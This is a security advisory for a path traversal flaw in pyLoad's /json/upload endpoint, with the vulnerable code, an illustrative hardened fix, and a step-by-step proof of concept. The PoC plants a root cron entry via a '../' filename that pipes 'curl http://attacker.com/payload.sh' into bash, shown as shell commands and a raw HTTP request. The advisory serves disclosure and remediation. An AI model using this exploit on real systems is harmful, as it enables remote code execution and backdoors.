GHSA-xqpg-92fq-grfg
`pyLoad` has Path Traversal Vulnerability in `json/upload` Endpoint that allows Arbitrary File Write
Details
## Summary

An **authenticated path traversal vulnerability** exists in the `/json/upload` endpoint of the `pyLoad` web UI. By **manipulating the filename of an uploaded file**, an attacker can traverse out of the intended upload directory, allowing them to **write arbitrary files to any location** on the system accessible to the pyLoad process. This may lead to:

* **Remote Code Execution (RCE)**
* **Local Privilege Escalation**
* **System-wide compromise**
* **Persistence and backdoors**
---
### Vulnerable Code
File: [`src/pyload/webui/app/blueprints/json_blueprint.py`](https://github.com/pyload/pyload/blob/df094db67ec6e25294a9ac0ddb4375fd7fb9ba00/src/pyload/webui/app/blueprints/json_blueprint.py#L109)
```python
# Excerpt from src/pyload/webui/app/blueprints/json_blueprint.py at the linked
# commit; `json_blueprint` and `api` are defined elsewhere in that module.
import os

from flask import request


@json_blueprint.route("/upload", methods=["POST"])
def upload():
    dir_path = api.get_config_value("general", "storage_folder")
    for file in request.files.getlist("file"):
        # file.filename is the client-supplied Content-Disposition filename,
        # used as-is: "../" segments survive the "tmp_" prefix and the join.
        file_path = os.path.join(dir_path, "tmp_" + file.filename)
        file.save(file_path)
```

**Issue**: `file.filename` is neither sanitized nor validated before being joined to the storage folder, so a name containing `../` sequences resolves to a path outside it.
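To make the defect concrete, the following added example (not pyLoad's code and not the fix in the referenced commit) puts the advisory's join beside a hardened replacement. `STORAGE` is a constructed value for the `storage_folder` setting, and the sanitisation in `safe_upload_path` is one reasonable pattern (the same shape as `werkzeug.utils.secure_filename`) chosen for illustration, not the project's own.

```python
import os
import re

# Constructed example value for pyLoad's "general/storage_folder" setting;
# not a path taken from the advisory.
STORAGE = "/var/lib/pyload/storage"

# Anything outside this small set is replaced; same idea as
# werkzeug.utils.secure_filename, implemented here without the dependency.
_UNSAFE_CHARS = re.compile(r"[^A-Za-z0-9_.-]")


class UnsafeFilename(ValueError):
    """Raised when an upload name cannot be mapped to a file inside storage."""


def vulnerable_upload_path(storage_folder: str, filename: str) -> str:
    """The join from the advisory: the client-supplied name goes straight
    into os.path.join with only a "tmp_" prefix, so every ".." segment
    after the first one walks out of storage_folder."""
    return os.path.join(storage_folder, "tmp_" + filename)


def escapes_folder(storage_folder: str, path: str) -> bool:
    """Lexical containment check. normpath collapses ".." segments without
    touching the filesystem, so this shows where a write would land
    before anything is opened or created."""
    root = os.path.normpath(os.path.abspath(storage_folder))
    target = os.path.normpath(os.path.abspath(path))
    return os.path.commonpath([root, target]) != root


def safe_upload_path(storage_folder: str, filename: str) -> str:
    """Hardened replacement: keep only the last path component (treating
    both / and backslash as separators so a Windows-style name is not one
    long component), whitelist its characters, refuse empty results, and
    re-check containment so a later change to the join cannot regress."""
    name = filename.replace("\\", "/").rsplit("/", 1)[-1]
    name = _UNSAFE_CHARS.sub("_", name).strip("._")
    if not name:
        raise UnsafeFilename(f"rejected upload name {filename!r}")
    path = os.path.join(storage_folder, "tmp_" + name)
    if escapes_folder(storage_folder, path):
        raise UnsafeFilename(f"{path!r} is outside {storage_folder!r}")
    return path


def is_rejected(storage_folder: str, filename: str) -> bool:
    """True if the hardened function refuses the name."""
    try:
        safe_upload_path(storage_folder, filename)
    except UnsafeFilename:
        return True
    return False


if __name__ == "__main__":
    payload = "../../../../etc/cron.d/pyload_backdoor"  # filename from the PoC
    for name in (payload, "..\\..\\boot.ini", "report.txt", ".."):
        vuln = vulnerable_upload_path(STORAGE, name)
        print(f"{name!r}")
        print(f"  vulnerable join -> {os.path.normpath(vuln)} "
              f"escapes={escapes_folder(STORAGE, vuln)}")
        if is_rejected(STORAGE, name):
            print("  hardened        -> rejected")
        else:
            print(f"  hardened        -> {safe_upload_path(STORAGE, name)}")
```

`escapes_folder` is deliberately lexical: at validation time you want to know where a name would land without creating anything. Two details matter when reproducing against the real join: the literal `tmp_` prefix turns the first `../` into a component named `tmp_..`, so the number of `../` segments needed to reach a given target depends on the depth of `storage_folder`; and on Linux the kernel resolves components one at a time rather than lexically, so the `open()` only succeeds if that `tmp_..` entry exists as a directory. The hardened version never hands a hostile name to the filesystem, so neither detail affects it.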
### Proof of Concept

Set up a vulnerable target with either option:

1. **Clone and install pyLoad from source** (the package is published on PyPI as `pyload-ng`):

```bash
git clone https://github.com/pyload/pyload
cd pyload
git checkout 0.4.20
python -m pip install -e .
pyload --userdir=/tmp/pyload
```

2. **Or install via pip (PyPI) in a virtualenv:**

```bash
python -m venv pyload-env
source pyload-env/bin/activate
pip install pyload==0.4.20
pyload
```

The version pins above are the reporter's; the affected and fixed versions recorded for this advisory are pyload-ng 0.5.0b3.dev89 and 0.5.0b3.dev90 (see the package section below), so reproduce against a build that predates the fix commit.

Then exploit it:

3. **Log in and obtain a session cookie** (the endpoint is authenticated, so credentials for any valid account are required):

```bash
curl -c cookies.txt -X POST http://127.0.0.1:8000/login \
  -d "username=admin&password=admin"
```

4. **Create the malicious cron payload**:

```bash
echo "*/1 * * * * root curl http://attacker.com/payload.sh | bash" > exploit
```

5. **Upload the file with a path traversal filename** (the `;filename=` part of `-F` sets the `Content-Disposition` filename that the server uses verbatim):

```bash
curl -b cookies.txt -X POST http://127.0.0.1:8000/json/upload \
  -F "file=@exploit;filename=../../../../etc/cron.d/pyload_backdoor"
```

6. On the next cron tick, cron runs the planted entry as root and fetches and executes the attacker's payload. This requires the pyLoad process to have write access to `/etc/cron.d` (in practice, running as root); with a less privileged service account the same primitive still overwrites any file that account can write.
### Burp Suite HTTP Request

```
POST /json/upload HTTP/1.1
Host: 127.0.0.1:8000
Cookie: session=SESSION_ID_HERE
Content-Type: multipart/form-data; boundary=------------------------d74496d66958873e

--------------------------d74496d66958873e
Content-Disposition: form-data; name="file"; filename="../../../../etc/cron.d/pyload_backdoor"
Content-Type: application/octet-stream

*/1 * * * * root curl http://attacker.com/payload.sh | bash
--------------------------d74496d66958873e--
```
Affected packages

- pyload-ng 0.5.0b3.dev89 (fixed in 0.5.0b3.dev90): `pip install --upgrade 'pyload-ng>=0.5.0b3.dev90'`

References
- https://github.com/pyload/pyload/security/advisories/GHSA-xqpg-92fq-grfg [WEB]
- https://nvd.nist.gov/vuln/detail/CVE-2025-54140 [ADVISORY]
- https://github.com/pyload/pyload/commit/fc4b136e9c4e7dcbb8e467ae802cb2c3f70a71b0 [WEB]
- https://github.com/pyload/pyload [PACKAGE]
- https://github.com/pyload/pyload/blob/df094db67ec6e25294a9ac0ddb4375fd7fb9ba00/src/pyload/webui/app/blueprints/json_blueprint.py#L109 [WEB]